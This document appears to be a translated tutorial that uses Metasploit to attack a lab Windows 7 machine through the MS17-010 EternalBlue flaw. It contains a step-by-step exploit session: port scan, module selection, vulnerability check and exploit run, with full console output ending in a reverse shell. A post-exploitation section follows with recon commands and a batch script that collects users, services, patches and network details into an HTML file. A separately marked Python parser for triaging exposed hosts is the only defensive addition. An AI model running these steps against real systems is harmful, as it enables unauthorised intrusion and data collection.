1. Introduction to Metasploit
Metasploit is an open-source vulnerability assessment tool that helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments, providing real security risk intelligence. Its capabilities include smart exploitation, code auditing, web application scanning and social engineering. Teams collaborate in Metasploit and present their findings in consolidated reports.
Metasploit is a free, downloadable framework that makes it easy to obtain, develop and launch attacks against software vulnerabilities. It ships with hundreds of professional-grade exploit modules for known software vulnerabilities. When H.D. Moore released Metasploit in 2003, the state of computer security changed permanently. Seemingly overnight, anyone could be a hacker, and everyone had access to exploits for unpatched or freshly patched vulnerabilities. Software vendors could no longer delay patches for disclosed vulnerabilities, because the Metasploit team was constantly developing exploits and contributing them to all Metasploit users.
2. Usage (MS17-010 as the example)
2.1 Preparing the environment
Kali-Linux
(base) root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.91.156 netmask 255.255.255.0 broadcast 192.168.91.255
inet6 fe80::20c:29ff:febf:3a23 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:bf:3a:23 txqueuelen 1000 (Ethernet)
RX packets 96 bytes 17375 (16.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 38 bytes 3529 (3.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 28 bytes 1516 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 1516 (1.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Windows7-SP1
2.2 Gathering information on the target host
Test network connectivity
Port probing:
(base) root@kali:~# nmap -O 192.168.91.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:06 EDT
Nmap scan report for 192.168.91.129
Host is up (0.0014s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
MAC Address: 00:0C:29:7B:61:47 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds
We can see that the target host has a large number of open ports. We choose port 445 as the entry point for attacking the host, using the EternalBlue vulnerability that was extremely widespread in 2017. An exploit (exp) for this vulnerability is already integrated into Metasploit.
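As an added defender-side example that is not part of the original post: a small Python parser for the normal-format nmap -O report shown above, which flags the two conditions this walkthrough relies on (tcp/445 reachable, and an OS fingerprint in the Windows 7/2008 range) so that such hosts can be prioritised for patch verification. The sample input is a trimmed copy of the report above; the finding wording and the regex thresholds are my own assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the relevant lines of the `nmap -O` report from the lab scan above.
NMAP_REPORT = """\
Nmap scan report for 192.168.91.129
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Running: Microsoft Windows 7|2008|8.1
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")


@dataclass
class HostReport:
    address: str = ""
    open_tcp: dict = field(default_factory=dict)  # port number -> service name
    os_guess: str = ""                            # text after "Running:"


def parse_nmap_report(text: str) -> HostReport:
    """Extract address, open TCP ports and OS guess from nmap's normal (non-XML) output."""
    report = HostReport()
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            report.address = m.group(1)
        elif m := PORT_RE.match(line):
            port, proto, state, service = m.groups()
            if proto == "tcp" and state == "open":
                report.open_tcp[int(port)] = service
        elif line.startswith("Running:"):
            report.os_guess = line.partition(":")[2].strip()
    return report


def smb_exposure_findings(report: HostReport) -> list:
    """Triage: does this host meet the exposure conditions the walkthrough relies on?"""
    findings = []
    if 445 in report.open_tcp:
        findings.append("tcp/445 (SMB) is reachable from the scanning segment")
    if 445 in report.open_tcp and re.search(r"Windows (7|2008)", report.os_guess):
        findings.append("SMB exposed on a Windows 7/2008-era fingerprint: verify MS17-010 patch state and SMBv1 status")
    return findings
```

Feed it the saved output of nmap -oN for a whole subnet and the findings list gives a patch-verification worklist; an empty list means neither condition was met.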
2.3 Launching the attack
Open a Kali Linux terminal and enter 【msfconsole】 to start Metasploit.
(base) root@kali:~# msfconsole
=[ metasploit v5.0.88-dev ]
+ -- --=[ 2013 exploits - 1093 auxiliary - 343 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search
msf5 >
Use 【search ms17-010】 to search for the EternalBlue modules
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
We first use the module with index 1 to scan the target host and confirm whether the MS17-010 vulnerability is present
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
Use 【show options】 to view the parameters this module requires; we can see that rhosts and rport need to be set. The rhosts parameter is the target host's IP address.
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.91.129
rhosts => 192.168.91.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Once the options are set, enter 【run】 or 【exploit】 to run the module.
In this example the output shows
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
which indicates that this vulnerability is present.
We use the exploit module marked in red in the original screenshot (exploit/windows/smb/ms17_010_eternalblue) to attack the target host
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Once the parameters are set (here RHOSTS has been set to 192.168.91.129), the attack can be launched.
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.91.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
It can be run with either the run command or the exploit command:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.91.156:4444
[*] 192.168.91.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.91.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.91.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.91.129:445 - Connecting to target for exploitation.
[+] 192.168.91.129:445 - Connection established for exploitation.
[+] 192.168.91.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.91.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.91.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.91.129:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.91.129:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.91.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.91.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.91.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.91.129:445 - Starting non-paged pool grooming
[+] 192.168.91.129:445 - Sending SMBv2 buffers
[+] 192.168.91.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.91.129:445 - Sending final SMBv2 buffers.
[*] 192.168.91.129:445 - Sending last fragment of exploit packet!
[*] 192.168.91.129:445 - Receiving response from exploit packet
[+] 192.168.91.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.91.129:445 - Sending egg to corrupted connection.
[*] 192.168.91.129:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.91.156:4444 -> 192.168.91.129:49216) at 2020-05-22 03:36:03 -0400
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.91.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>
When the C:\Windows\system32> prompt appears, the attack has succeeded.
Next we gather host information from the target host.
Fixing garbled Chinese output in the shell obtained through Metasploit on Kali:
chcp 65001
3. Common information-gathering commands
3.1 whoami: check the current user's privileges
3.2 Query network configuration
Run ipconfig /all to get the local network configuration
Use systeminfo to query the operating system version and details
3.3 Query local service information
wmic service list brief
3.4 Query the process list and process information
tasklist
wmic process list brief
3.5 View startup programs
wmic startup get command,caption
3.6 View host boot time
net statistics workstation
3.7 Query the user list
net user
Get the local administrators
net localgroup administrators
View currently logged-on users
query user || qwinsta
3.8 View the patch list
wmic qfe get Caption,Description,HotFixID,InstalledOn
3.9 Automated collection
To make information gathering more efficient, you can create a script that performs the corresponding collection on the target host. Open Notepad, enter the following commands, and save the file with a .bat extension; running it collects the target host's information automatically and writes it out as HTML.
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html